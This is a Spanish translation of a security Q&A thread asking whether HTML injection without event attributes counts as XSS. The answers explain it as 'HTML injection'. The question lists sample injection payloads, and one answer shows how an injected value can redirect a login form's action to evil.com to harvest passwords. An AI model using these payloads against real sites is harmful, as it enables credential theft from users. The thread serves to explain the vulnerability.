¿Podemos considerar la inyección de etiquetas HTML sin atributos de evento como XSS?

Navega tus respuestas
0

Me pregunto si podemos considerar la inyección de etiquetas HTML como a , image , img , video , audio , marquee o iframe sin un atributo de evento como XSS ? Dado que no hay JavaScript involucrado y por lo tanto no se incluye y ejecuta ningún código JavaScript. Sin embargo, se carga un recurso (externo) o, en el caso de la etiqueta marquee , se activa una animación (a menudo se arruina la plantilla). Además de la etiqueta a -tag, el riesgo de ser capaz de incluir URLs cliqueables.

Entonces, ¿se considera una inyección de HTML puro (incluso si se rompe algo como un campo de entrada) como XSS válido, y cuál sería la motivación para explicar que es un XSS válido?

Algunos ejemplos:

  1. "><marquee>123
  2. "><img src=http://example.com/a.jpg
  3. <a href=//example.com>123</a>
pregunta Bob Ortiz 17.06.2016 - 13:58
fuente

2 respuestas

2

No, no llamaría a ese script de sitio cruzado, ya que no hay un script real involucrado. ¡Pero eso no significa que no sea un riesgo de seguridad! El término correcto para la vulnerabilidad sería "inyección HTML", y como señala en su pregunta, puede ser algo peligroso.

Este es otro ejemplo, solo para mostrar cómo la inyección de HTML puede usarse para causar un daño real. Digamos que tienes este código PHP: 

echo "<form method='post' class='" + $untrusted + "' action='login.php'>";

Y digamos que $untrusted se establece en ' action='http://evil.com . No necesita XSS cuando puede cosechar contraseñas utilizando HTML antiguo.

    
respondido por el Anders 17.06.2016 - 14:02
fuente
2

Creo que el escenario en el que estás hablando debería llamarse inyección HTML. A veces, puede haber un filtro XSS implementado que no permita ningún atributo de evento (la lista es enorme), así como etiquetas de script. En ese caso, "obtener XSS es difícil". Aunque, las listas negras rara vez funcionan para prevenir el XSS.

    
respondido por el entropy 17.06.2016 - 14:06
fuente

Lea otras preguntas en las etiquetas

¿Por qué los sitios habilitados para SSL no responden de acuerdo con el registro del archivo "hosts"? ¿Puedo detectar cuándo se copia un archivo en Windows?